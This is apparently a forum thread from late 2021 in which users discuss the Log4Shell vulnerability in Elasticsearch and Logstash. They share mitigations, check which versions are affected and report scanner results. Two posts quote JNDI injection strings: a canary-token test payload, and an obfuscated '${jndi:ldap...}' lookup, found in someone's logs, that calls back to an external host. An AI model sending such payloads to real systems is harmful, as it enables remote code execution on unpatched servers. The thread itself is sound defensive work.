Zero-day-exploit in log4j2 which is part of elasticsearch

  1. Is this a problem on Elastic Cloud (as I understand, it is not) for ES6 and ES7.
  2. Is this a problem on Elastic Cloud for clusters not yet upgraded (ES5)? I could not find any info on this (yes, this week upgrading to ES6-ES7 will be priority...)

@elastic Thanks for all the effort you put in this. Please focus on making sure the patch works and fully covers Logstash, so we don't have to install 7.16.2 in a few days..

So is it possible to provide a SIEM rule which does not require the Elastic Endpoint Security agent process dataset? (See my previous post)

Thanks for the response.

Sorry, this post should have gone in the Logstash section. I will open a new thread there.

And yeah, I'm mostly interested in the best practices and how other plugins which may be affected plan to handle that.

As a workaround for Logstash, if you can do the following before attempting to parse the event, it seems to mitigate the issue.

  if "jndi:" in [message] {
    mutate {
      gsub => [
        "[message]", "jndi", "BLART"
      ]
    }
  }

Using the same testing approach you did, I can confirm that my canary token is NOT triggered if this appears before the json {} filter

Logstash output

[2021-12-12T10:33:08,722][WARN ][logstash.filters.json    ][main][18d8528acb4b1628914404ffc234140d00f6c382fc7f21dbd350ac59bbd38fa5] Error parsing json {:source=>"message", :raw=>"${BLART:ldap://xxx.canarytokens.com/a}", :exception=>#<LogStash::Json::ParserError: Unrecognized token '$': was expecting ('true', 'false' or 'null')
 at [Source: (byte[])"${BLART:ldap://xxx.canarytokens.com/a}"; line: 1, column: 3]>}
{
          "host" => "c1523f8434cf",
       "message" => "${BLART:ldap://xxx.canarytokens.com/a}",
          "tags" => [
        [0] "_jsonparsefailure"
    ],
      "@version" => "1",
          "type" => "stdin",
    "@timestamp" => 2021-12-12T10:33:08.534Z
}

Does Logstash needs to be restarted after doing:

zip -q -d <LOGSTASH_HOME>/logstash-core/lib/jars/log4j-core-2.* org/apache/logging/log4j/core/lookup/JndiLookup.class

?

On a somewhat related note - you should also make sure that this command indeed removes JndiLookup.class from the jar.

In my case, when testing it, that didn't happen - glob expansion didn't work correctly with zip, so I needed to specify full path to log4j jar.

Here is a temporary workaround I'm using (from Dockerfile):

RUN find /opt/logstash/ -name "*log4j*core*.jar" 2>&1
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi
RUN zip -q -d /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
RUN zip -q -d /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi

In my case, I also verify that Jndi class has been correctly removed by grepping the jar contents before and after and I also removed that class from log4j.jar which comes bundled with a plugin.

3 Likes

Thanks @Kami

@elastic Please update Elastic Security Announcement for log4shell with updated commands to also remove the class from Logstash plugins etc? (if necessary) And please let me know if Logstash restart is required after removal of the class.

Please be aware that it's possible to trigger a JNDI lookup from an input plugin, before any filter kicks in, therefore I'd refrain from relying on this workaround.
The only known mitigation until the release is out is to remove the class from the log4j jar as stated in the advisory.

3 Likes

@willemdh the advisory will be updated to note the need to restart after removing the class from the jar.

remove the class from Logstash plugins etc? (if necessary)

This is won't be necessary as the loaded log4j-core jar is from logstash-core.

2 Likes

Please, How can I check exactly if my version of self-hosted elastic is exploitable or not?

Well, but be aware of obfuscation. I've found the following in my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"

so, the query doesn't match.

Is there any indication when 7.16.1 is being released?

Edit: read over it, sorry. Target is today.

Base on the affected version of the announcement, would like to confirm actually nothing need to do if

  1. Elasticsearch version is 7.2+ with bundled JDK11+
  2. logstash 7.X with JDK 11.0.1+

is it correct?

2 Likes

Looks like 7.16.1 is now released.

And when I tried to list files inside /usr/share/elasticsearch/lib directory, it seems like log4j-core JAR file is removed from the distribution (at least from my observation inside the Docker image)

user@hostname:/usr/share/elasticsearch# ls -lah lib/
total 29M
dr-xr-xr-x. 3 root root 4.0K Dec 11 00:35 .
drwxrwxr-x. 1 root root   81 Dec 11 05:12 ..
-r--r--r--. 1 root root 112K May 11  2020 HdrHistogram-2.1.9.jar
-r--r--r--. 1 root root  14M Dec 11 00:30 elasticsearch-7.16.1.jar
-r--r--r--. 1 root root  27K Dec 11 00:30 elasticsearch-cli-7.16.1.jar
-r--r--r--. 1 root root  69K Dec 11 00:30 elasticsearch-core-7.16.1.jar
-r--r--r--. 1 root root  52K Dec 11 00:30 elasticsearch-geo-7.16.1.jar
-r--r--r--. 1 root root  43K Dec 11 00:32 elasticsearch-launchers-7.16.1.jar
-r--r--r--. 1 root root 1.6M Dec 11 00:31 elasticsearch-log4j-7.16.1.jar
-r--r--r--. 1 root root  28K Dec 11 00:30 elasticsearch-lz4-7.16.1.jar
-r--r--r--. 1 root root  14K Dec 11 00:30 elasticsearch-plugin-classloader-7.16.1.jar
-r--r--r--. 1 root root  19K Dec 11 00:30 elasticsearch-secure-sm-7.16.1.jar
-r--r--r--. 1 root root 154K Dec 11 00:30 elasticsearch-x-content-7.16.1.jar
-r--r--r--. 1 root root 1.2M May 11  2020 hppc-0.8.1.jar
-r--r--r--. 1 root root 342K May 11  2020 jackson-core-2.10.4.jar
-r--r--r--. 1 root root  58K May 11  2020 jackson-dataformat-cbor-2.10.4.jar
-r--r--r--. 1 root root  89K May 11  2020 jackson-dataformat-smile-2.10.4.jar
-r--r--r--. 1 root root  46K May 11  2020 jackson-dataformat-yaml-2.10.4.jar
-r--r--r--. 1 root root  17K Dec 11 00:32 java-version-checker-7.16.1.jar
-r--r--r--. 1 root root 1.7M Nov 24 09:22 jna-5.10.0.jar
-r--r--r--. 1 root root 630K May  4  2021 joda-time-2.10.10.jar
-r--r--r--. 1 root root  77K May 11  2020 jopt-simple-5.0.2.jar
-r--r--r--. 1 root root 258K May 11  2020 log4j-api-2.11.1.jar
-r--r--r--. 1 root root 1.8M Oct 20 23:41 lucene-analyzers-common-8.10.1.jar
-r--r--r--. 1 root root 152K Oct 20 23:41 lucene-backward-codecs-8.10.1.jar
-r--r--r--. 1 root root 3.5M Oct 20 23:41 lucene-core-8.10.1.jar
-r--r--r--. 1 root root  97K Oct 20 23:41 lucene-grouping-8.10.1.jar
-r--r--r--. 1 root root 206K Oct 20 23:41 lucene-highlighter-8.10.1.jar
-r--r--r--. 1 root root 149K Oct 20 23:41 lucene-join-8.10.1.jar
-r--r--r--. 1 root root  51K Oct 20 23:41 lucene-memory-8.10.1.jar
-r--r--r--. 1 root root 104K Oct 20 23:41 lucene-misc-8.10.1.jar
-r--r--r--. 1 root root 373K Oct 20 23:41 lucene-queries-8.10.1.jar
-r--r--r--. 1 root root 374K Oct 20 23:41 lucene-queryparser-8.10.1.jar
-r--r--r--. 1 root root 240K Oct 20 23:41 lucene-sandbox-8.10.1.jar
-r--r--r--. 1 root root 303K Oct 20 23:41 lucene-spatial3d-8.10.1.jar
-r--r--r--. 1 root root 245K Oct 20 23:41 lucene-suggest-8.10.1.jar
-r--r--r--. 1 root root 667K Jul  1 16:01 lz4-java-1.8.0.jar
-r--r--r--. 1 root root 302K May 11  2020 snakeyaml-1.26.jar
-r--r--r--. 1 root root  51K May 11  2020 t-digest-3.2.jar
dr-xr-xr-x. 6 root root   81 Dec 11 00:35 tools

So I assume that Elastic is mitigating this issue by removing that JAR file entirely?

will it support the new Logstash 6.8.21 or 7.16.1 for the Elasticsearch 5.5.0 and 6.8.0?

1 Like

Is the ES-Hadoop connector affected by this issue?

I assume it is not affected as it is a library and any logging would done by the caller (ie. Hadoop/Spark/Hive). But a confirmation would be good.

Thanks.

I tried running https://github.com/mergebase/log4j-detector over it and that's my result:

(gotti@plattfisch 796) docker run --rm -it --entrypoint bash docker.elastic.co/elasticsearch/elasticsearch:7.16.1
root@95841cb1bcd7:/usr/share/elasticsearch# ls
LICENSE.txt  NOTICE.txt  README.asciidoc  bin  config  data  jdk  lib  logs  modules  plugins
root@95841cb1bcd7:/usr/share/elasticsearch# jdk/bin/ja
jar        jarsigner  java       javac      javadoc    javap
root@95841cb1bcd7:/usr/share/elasticsearch# jdk/bin/java -jar /tmp/log4j-detector-2021.12.12.jar .
-- Analyzing paths (could take a long time).
-- Note: specify the '--verbose' flag to have every file examined printed to STDERR.
./bin/elasticsearch-sql-cli-7.16.1.jar contains Log4J-2.x   >= 2.10.0 _VULNERABLE_ :-(
./lib/elasticsearch-log4j-7.16.1.jar contains Log4J-2.x   <= 2.0-beta8 _POTENTIALLY_SAFE_ :-|
root@95841cb1bcd7:/usr/share/elasticsearch#

Looks like the vulnerability is only partially fixed ...

3 Likes

We have successfully mitigated it .
just follow below links.

https://dlcdn.apache.org/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.tar.gz

https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html

For more details feel free to connect. Cheers

REgards,
Amit Potdar

How to fix this Log4j issue if we have installed Elasticsearch through Package?
Do you provide any steps to resolve this issue and upgrade to the latest version?

Is there a way to download Elasticsearch 6.8.21? The link from the download page currently gives a 404.